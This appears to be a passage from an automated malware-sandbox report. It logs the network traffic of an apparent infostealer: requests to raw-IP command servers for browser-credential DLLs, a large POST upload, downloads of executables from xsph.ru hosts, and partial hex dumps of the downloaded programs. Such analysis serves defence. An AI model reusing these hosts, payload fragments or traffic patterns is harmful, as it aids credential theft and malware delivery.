                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /POeNDXYchB.php HTTP/1.1Host: 185.7.214.239Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: 185.7.214.239Cache-Control: no-cacheCookie: PHPSESSID=9tonum6b55n3ncs7ru7lrdrlt3
                      Source: global trafficHTTP traffic detected: POST /706 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.180.72Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST /408 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 116.202.186.120Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.180.72Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.180.72Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.180.72Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.180.72Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /POeNDXYchB.php HTTP/1.1Content-Type: multipart/form-data; boundary=----2N7Y5F3OHDJMYUAIHost: 185.7.214.239Content-Length: 120040Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=9tonum6b55n3ncs7ru7lrdrlt3
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 116.202.186.120Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /lava.exe HTTP/1.1Host: f0616071.xsph.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Music.exe HTTP/1.1Host: f0616073.xsph.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:47 GMTContent-Type: application/x-msdos-programContent-Length: 343040Connection: closeLast-Modified: Tue, 04 Jan 2022 18:32:02 GMTETag: "53c00-5d4c5da79a842"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d2 e4 eb a6 96 85 85 f5 96 85 85 f5 96 85 85 f5 88 d7 10 f5 84 85 85 f5 88 d7 06 f5 ee 85 85 f5 b1 43 fe f5 95 85 85 f5 96 85 84 f5 52 85 85 f5 88 d7 01 f5 d6 85 85 f5 88 d7 11 f5 97 85 85 f5 88 d7 14 f5 97 85 85 f5 52 69 63 68 96 85 85 f5 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 0e 28 83 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 40 04 00 00 08 02 00 00 00 00 00 10 2e 02 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 06 00 00 04 00 00 e2 14 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 3d 04 00 28 00 00 00 00 c0 05 00 60 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 38 23 00 00 60 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 a7 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 3e 04 00 00 10 00 00 00 40 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 25 01 00 00 50 04 00 00 16 00 00 00 44 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 65 6b 75 76 6f 78 05 00 00 00 00 80 05 00 00 02 00 00 00 5a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 75 74 75 00 00 00 4b 00 00 00 00 90 05 00 00 02 00 00 00 5c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 65 7a 65 76 00 00 ea 00 00 00 00 a0 05 00 00 02 00 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 75 62 6f 6e 65 00 93 0d 00 00 00 b0 05 00 00 0e 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 8d 00 00 00 c0 05 00 00 8e 00 00 00 6e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 3e 00 00 00 50 06 00 00 40 00 00 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:32:53 GMTContent-Type: application/x-msdos-programContent-Length: 358912Connection: closeLast-Modified: Mon, 03 Jan 2022 22:00:28 GMTETag: "57a00-5d4b4a60838eb"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6b 91 a1 53 2f f0 cf 00 2f f0 cf 00 2f f0 cf 00 31 a2 5a 00 3d f0 cf 00 31 a2 4c 00 57 f0 cf 00 08 36 b4 00 2a f0 cf 00 2f f0 ce 00 ee f0 cf 00 31 a2 4b 00 10 f0 cf 00 31 a2 5b 00 2e f0 cf 00 31 a2 5e 00 2e f0 cf 00 52 69 63 68 2f f0 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 74 f1 e5 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 3c 04 00 00 4a 02 00 00 00 00 00 c0 34 02 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 41 c1 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 39 04 00 3c 00 00 00 00 30 06 00 f8 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 14 23 00 00 50 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a6 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 3a 04 00 00 10 00 00 00 3c 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 60 9a 01 00 00 50 04 00 00 8c 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 61 6d 69 63 61 6b 05 00 00 00 00 f0 05 00 00 02 00 00 00 cc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 73 00 00 00 00 4b 00 00 00 00 00 06 00 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 6f 64 61 76 00 00 ea 00 00 00 00 10 06 00 00 02 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 67 69 72 6f 66 93 0d 00 00 00 20 06 00 00 0e 00 00 00 d2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 59 00 00 00 30 06 00 00 5a 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a2 3e 00 00 00 90 06 00 00 40 00 00 00 3a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Jan 2022 18:33:29 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Tue, 04 Jan 2022 10:19:11 GMTETag: "16db40-5d4bef7dfbaec"Accept-Ranges: bytesContent-Length: 1497920Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 aa cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2e 01 00 00 48 06 00 00 00 00 00 00 60 2a 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 2b 00 00 04 00 00 01 5e 17 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 25 00 50 01 00 00 00 a0 25 00 00 bd 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 72 65 6c 6f 63 00 00 00 80 25 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 69 74 65 78 74 00 00 00 10 00 00 00 90 25 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 bd 04 00 00 a0 25 00 69 bb 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 00 00 00 80 01 00 00 60 2a 00 7d 7d 01 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:36 GMTContent-Type: application/x-msdos-programContent-Length: 760832Connection: closeLast-Modified: Sun, 02 Jan 2022 14:19:12 GMTETag: "b9c00-5d49a1695789b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a 38 7e 52 3e 59 10 01 3e 59 10 01 3e 59 10 01 20 0b 85 01 2c 59 10 01 20 0b 93 01 46 59 10 01 19 9f 6b 01 3b 59 10 01 3e 59 11 01 80 59 10 01 20 0b 94 01 7e 59 10 01 20 0b 84 01 3f 59 10 01 20 0b 81 01 3f 59 10 01 52 69 63 68 3e 59 10 01 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 2e e4 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 6c 0a 00 00 3c 02 00 00 00 00 00 80 67 08 00 00 10 00 00 00 80 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 48 00 00 04 00 00 65 d4 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 6a 0a 00 3c 00 00 00 00 30 0c 00 b0 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 23 00 00 40 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 a3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc 6a 0a 00 00 10 00 00 00 6c 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 9a 01 00 00 80 0a 00 00 8c 00 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 6f 68 61 63 00 00 05 00 00 00 00 20 0c 00 00 02 00 00 00 fc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 c9 3b 00 00 30 0c 00 00 5a 00 00 00 fe 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 74 42 00 00 00 00 48 00 00 44 00 00 00 58 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 04 Jan 2022 18:33:50 GMTContent-Type: application/octet-streamContent-Length: 1531904Last-Modified: Tue, 04 Jan 2022 16:33:34 GMTConnection: keep-aliveETag: "61d476de-176000"Expires: Tue, 11 Jan 2022 18:33:50 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 18 8c 24 7a 79 e2 77 7a 79 e2 77 7a 79 e2 77 6e 12 e1 76 77 79 e2 77 6e 12 e7 76 dc 79 e2 77 6e 12 e6 76 6c 79 e2 77 28 0c e6 76 6b 79 e2 77 28 0c e1 76 6e 79 e2 77 28 0c e7 76 30 79 e2 77 6e 12 e3 76 7f 79 e2 77 7a 79 e3 77 24 79 e2 77 c0 0c e7 76 7b 79 e2 77 c0 0c 1d 77 7b 79 e2 77 c0 0c e0 76 7b 79 e2 77 52 69 63 68 7a 79 e2 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 1a 0b d3 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 24 02 00 00 c8 02 00 00 00 00 00 00 10 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 32 00 00 04 00 00 09 e8 2b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c dc 2d 00 e0 00 00 00 00 50 03 00 1d a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 20 02 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 02 00 00 08 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 00 00 00 40 02 00 00 62 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 30 03 00 00 04 00 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 b0 01 00 00 50 03 00 00 a4 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 00 05 00 00 16 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 20 05 00 00 02 00 00 00 46 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 a0 28 00 00 30 05 00 00 72 0f 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 37 77 30 44 50 41 31 00 b0 04 00 00 d0 2d 00 00 a6 04 00 00 ba 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 61 64 61 74 61 00 00 00 10 00 00 00 80 32 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Jan 2022 18:33:52 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 29 Dec 2021 18:27:40 GMTETag: "9d9d8-5d44d17c6d03f"Accept-Ranges: bytesContent-Length: 645592Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 